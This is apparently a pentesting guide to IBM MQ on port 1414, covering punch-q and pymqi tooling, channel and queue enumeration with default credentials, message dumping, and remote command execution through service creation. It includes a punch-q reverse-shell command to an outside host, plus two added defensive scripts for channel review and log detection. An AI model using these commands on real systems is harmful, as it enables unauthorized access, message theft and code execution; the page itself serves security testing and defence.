1414 - Pentesting IBM MQ


Basic Information

IBM MQ is an IBM technology for managing message queues. Like other message broker technologies, it is dedicated to receiving, storing, processing and dispatching information between producers and consumers.

By default, it exposes the IBM MQ TCP port 1414. Sometimes, the HTTP REST API is also exposed on port 9443. Metrics (Prometheus) may also be reachable on TCP port 9157.

The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but also to administer the instance itself.

IBM provides extensive technical documentation at https://www.ibm.com/docs/en/ibm-mq.

Tools

The recommended tool for easy exploitation is punch-q, preferably used through Docker. The tool currently relies on the Python library pymqi.

For a more manual approach, use the Python library pymqi directly. The IBM MQ client dependencies are required.

Installing pymqi

The IBM MQ dependencies need to be installed and loaded:

  1. Create an account (IBMid) on https://login.ibm.com/.

  2. Extract the client archive (tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz).

  3. Run sudo ./mqlicense.sh to accept the license terms.

If you are on Kali Linux, modify the file mqlicense.sh: remove or comment out the following lines (around lines 105-110):

if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
 then
   echo "ERROR: This package is incompatible with this system"
   echo "       This package was built for ${BUILD_PLATFORM}"
   exit 1
fi

  4. Install these packages:

sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
  5. Then, temporarily add the .so files to the library path with export LD_LIBRARY_PATH=/opt/mqm/lib64 before running other tools that use these dependencies.

Then, you can clone the pymqi project: it contains interesting code snippets, constants, ... Or you can directly install the library with pip install pymqi.

Using punch-q

With Docker

Simply use: sudo docker run --rm -ti leonjza/punch-q.

Without Docker

Clone the punch-q project, then follow the installation instructions (pip install -r requirements.txt && python3 setup.py install).

Afterwards, it can be used with the punch-q command.

Enumeration

You can try to enumerate the queue manager name, the users, the channels and the queues with punch-q or pymqi.

Queue Manager

Sometimes, there is no protection against retrieving the Queue Manager name:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR

Channels

punch-q uses an internal (modifiable) wordlist to find existing channels. Usage example:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.

It happens that some IBM MQ instances accept unauthenticated MQ requests, so --username / --password are not needed. Of course, access rights can also vary.

As soon as we get one channel name (here: DEV.ADMIN.SVRCONN), we can enumerate all the other channels.

The enumeration can basically be done with this code snippet, code/examples/dis_channels.py from pymqi:

import logging
import pymqi

logging.basicConfig(level=logging.INFO)

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

prefix = '*'

args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
    if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
        logging.info('No channels matched prefix `%s`' % prefix)
    else:
        raise
else:
    for channel_info in response:
        channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
        logging.info('Found channel `%s`' % channel_name)

qmgr.disconnect()

... But punch-q also embeds that part (with more information!). It can be launched with:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...

| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |
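From a defender's point of view, the table above is also a hardening checklist: the server-connection (SVRCONN) channels are the ones remote clients such as punch-q connect to. The following is an added example (not code from punch-q, pymqi or IBM) that parses the punch-q table and flags SVRCONN channels that are exposed without an MCAUSER or a TLS cipher, and SYSTEM.* SVRCONN channels that are still reachable. The review criteria are standard IBM MQ hardening heuristics assumed here, not rules the page states; the input table is the page's own output embedded as a constructed sample.

```python
"""Review a punch-q 'show channels' table for weak SVRCONN exposure.

Added example, not part of punch-q, pymqi or IBM MQ. The hardening
criteria (block SYSTEM.* SVRCONN channels, set MCAUSER and a TLS cipher
on every SVRCONN) are assumptions based on common IBM MQ guidance.
"""
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the rows punch-q printed on this page.
SAMPLE_TABLE = """\
| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |
"""


@dataclass
class Channel:
    name: str
    ctype: str
    mca_user: str
    ssl_cipher: str


def parse_channel_table(text: str) -> List[Channel]:
    """Parse the pipe-delimited punch-q table into Channel records, driven by the header row."""
    rows = [ln for ln in text.splitlines() if ln.startswith("|") and not ln.startswith("|-")]
    header = [c.strip() for c in rows[0].strip("|").split("|")]
    idx = {name: i for i, name in enumerate(header)}
    channels = []
    for row in rows[1:]:
        cells = [c.strip() for c in row.strip("|").split("|")]
        channels.append(Channel(
            name=cells[idx["Name"]],
            ctype=cells[idx["Type"]],
            mca_user=cells[idx["MCA UID"]],
            ssl_cipher=cells[idx["SSL Cipher"]],
        ))
    return channels


def review_channels(channels: List[Channel]) -> Dict[str, List[str]]:
    """Return {channel name: [findings]} for server-connection channels only."""
    findings: Dict[str, List[str]] = {}
    for ch in channels:
        if ch.ctype != "Server-connection":
            continue  # only SVRCONN channels accept remote client connections
        issues = []
        if ch.name.startswith("SYSTEM."):
            issues.append("SYSTEM.* SVRCONN channel reachable; block it with a CHLAUTH rule")
        if not ch.mca_user:
            issues.append("no MCAUSER set: the channel runs under the identity asserted by the client")
        if not ch.ssl_cipher:
            issues.append("no TLS cipher: credentials and messages travel in clear text")
        if issues:
            findings[ch.name] = issues
    return findings


if __name__ == "__main__":
    for name, issues in review_channels(parse_channel_table(SAMPLE_TABLE)).items():
        print(name)
        for issue in issues:
            print("  -", issue)
```

Run against the table above, DEV.ADMIN.SVRCONN is flagged twice (no MCAUSER, no TLS), DEV.APP.SVRCONN once (no TLS), and the two SYSTEM.* SVRCONN channels three times each; the receiver and client-connection channels are ignored because they do not accept inbound client connections.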

Queues

There is a code snippet with pymqi (dis_queues.py), but punch-q allows retrieving more information about the queues:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created             | Name                  | Type  | Usage  | Depth | Rmt. QMGR Name | Rmt. Queue Name | Description |
|---------------------|-----------------------|-------|--------|-------|----------------|-----------------|-------------|
| 2023-10-10 18.35.19 | DEV.DEAD.LETTER.QUEUE | Local | Normal | 0     |                |                 |             |
| 2023-10-10 18.35.19 | DEV.QUEUE.1           | Local | Normal | 0     |                |                 |             |
| 2023-10-10 18.35.19 | DEV.QUEUE.2           | Local | Normal | 0     |                |                 |             |
| 2023-10-10 18.35.19 | DEV.QUEUE.3           | Local | Normal | 0     |                |                 |             |
# Truncated

Exploit

Dump messages

You can target queue(s) / channel(s) to sniff / dump messages from them (non-destructive operation). Examples:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump

Don't hesitate to iterate over all the identified queues.

Code execution

Some details before continuing: IBM MQ can be controlled through several interfaces: MQSC, PCF and control commands. General lists can be found in the IBM MQ documentation. PCF (Programmable Command Formats) is what we focus on to interact remotely with the instance; punch-q, and underneath it pymqi, are based on PCF interactions.

A list of PCF commands can be found in the IBM MQ documentation.

One interesting command is MQCMD_CREATE_SERVICE, documented in the IBM MQ reference. It takes a StartCommand argument pointing to a local program on the instance (example: /bin/sh).

The documentation also carries a warning for this command: "Caution: This command allows a user to run an arbitrary command with mqm authority. If granted rights to use this command, a malicious or careless user could define a service which damages your systems or data, for example, by deleting essential files."

Note: according to the IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at /admin/action/qmgr/{qmgrName}/mqsc to run the equivalent MQSC command for service creation (DEFINE SERVICE). This aspect is not covered here yet.

Service creation / deletion with PCF for remote program execution can be done with punch-q:

Example 1

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"

In the IBM MQ logs, you can read that the command was successfully executed:

2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]

You can also enumerate the programs present on the instance (here /bin/doesnotexist ... does not exist):

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --args "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436

Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done

Please note that the program launch is asynchronous, so you need a second component to leverage it (a listener for a reverse shell, a file created on a different service, data exfiltration over the network, ...).

Example 2

For an easy reverse shell, punch-q also offers two reverse shell payloads:

  • One with bash

  • One with perl

You can of course build a custom one with the execute command.

With bash:
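The AMQ5030I line above is also the trace a defender should be watching for: every service created this way produces a "The Command '<name>' has started" entry, and punch-q names its throw-away services with random 16-hex-character identifiers (808544aa7fc94c48 and 6e3ef5af652b4436 on this page). The following is an added example, not code from IBM MQ, punch-q or pymqi, that parses such error-log lines and flags service starts whose name is not in an administrator-maintained allow-list or looks machine-generated. The sample log lines and the allow-list are constructed; the random-name heuristic is an assumption, not an IBM rule.

```python
"""Flag suspicious service starts in IBM MQ error-log lines.

Added example, not part of IBM MQ, punch-q or pymqi. Parses AMQ5030I
("The Command '<name>' has started") entries like the one shown above.
The allow-list and the random-name heuristic are assumptions.
"""
import re
from typing import Dict, List, Optional, Set

# Matches the AMQ5030I line format quoted on this page.
AMQ5030I_RE = re.compile(
    r"^(?P<ts>\S+)\s+AMQ5030I:\s+The Command '(?P<name>[^']+)' has started\."
    r"\s+ProcessId\((?P<pid>\d+)\)"
)
# punch-q style service names: 16 lowercase hex characters.
RANDOM_HEX_RE = re.compile(r"^[0-9a-f]{16}$")

# Constructed sample: two punch-q style service starts, one unrelated line,
# one legitimately defined service.
SAMPLE_LOG = """\
2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
2023-10-10T19:13:02.001Z AMQ9002I: Channel 'DEV.ADMIN.SVRCONN' is starting.
2023-10-10T19:20:44.120Z AMQ5030I: The Command 'NIGHTLY.BACKUP' has started. ProcessId(702). [ArithInsert1(702), CommentInsert1(NIGHTLY.BACKUP)]
2023-10-10T19:25:10.555Z AMQ5030I: The Command '6e3ef5af652b4436' has started. ProcessId(731). [ArithInsert1(731), CommentInsert1(6e3ef5af652b4436)]
"""

# Services the administrators actually defined (constructed allow-list).
KNOWN_SERVICES: Set[str] = {"NIGHTLY.BACKUP"}


def parse_service_start(line: str) -> Optional[Dict[str, str]]:
    """Return {'ts', 'name', 'pid'} for an AMQ5030I line, else None."""
    m = AMQ5030I_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious_service_starts(log_text: str, known: Set[str]) -> List[Dict[str, str]]:
    """Service starts whose name is not allow-listed; notes when it also looks machine-generated."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_service_start(line)
        if ev is None or ev["name"] in known:
            continue
        ev["reason"] = ("random 16-hex service name" if RANDOM_HEX_RE.match(ev["name"])
                        else "service not in allow-list")
        hits.append(ev)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_service_starts(SAMPLE_LOG, KNOWN_SERVICES):
        print(f"{hit['ts']} service={hit['name']} pid={hit['pid']}: {hit['reason']}")
```

Because the service is started and cleaned up within seconds (the "Giving the service 0 second(s) to live" step above), the log entry is frequently the only durable artefact; correlating the ProcessId with host-side process auditing is the natural next step.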

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

With perl:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

Custom PCF

You can dig into the IBM MQ documentation and use the pymqi Python library directly to test a specific PCF command that is not implemented in punch-q.

Example:

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    # Replace here with your custom PCF args and command
    # The constants can be found in pymqi/code/pymqi/CMQCFC.py
    args = {pymqi.CMQCFC.xxxxx: "value"}
    response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
    # comp and reason are the MQ completion and reason codes of the failure
    print("Error: comp=%s reason=%s" % (e.comp, e.reason))
else:
    # Process response: a list of dicts keyed by PCF parameter constants
    print(response)

qmgr.disconnect()

If you cannot find the constant names, you can refer to the IBM MQ documentation.

Example with MQCMD_REFRESH_CLUSTER (Decimal = 73). It needs the parameter MQCA_CLUSTER_NAME (Decimal = 2029), which can be *:

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    # 2029 = MQCA_CLUSTER_NAME; numeric constants work when the name is unknown
    args = {2029: "*"}
    # MQCMD_REFRESH_CLUSTER = 73
    response = pcf.MQCMD_REFRESH_CLUSTER(args)
except pymqi.MQMIError as e:
    print("Error: comp=%s reason=%s" % (e.comp, e.reason))
else:
    print(response)

qmgr.disconnect()

Testing environment

If you want to test IBM MQ behaviour and vulnerabilities, you can set up a local environment based on Docker:

  1. Have an account on ibm.com and cloud.ibm.com.

  2. Create a containerized IBM MQ with:

sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2

By default, authentication is enabled, the username is admin and the password is passw0rd (environment variable MQ_ADMIN_PASSWORD). Here, the queue manager name has been set to MYQUEUEMGR (variable MQ_QMGR_NAME).

You should have IBM MQ up and running with its ports exposed:

❯ sudo docker ps
CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq

Older releases of the IBM MQ Docker images are available at: https://hub.docker.com/r/ibmcom/mq/.
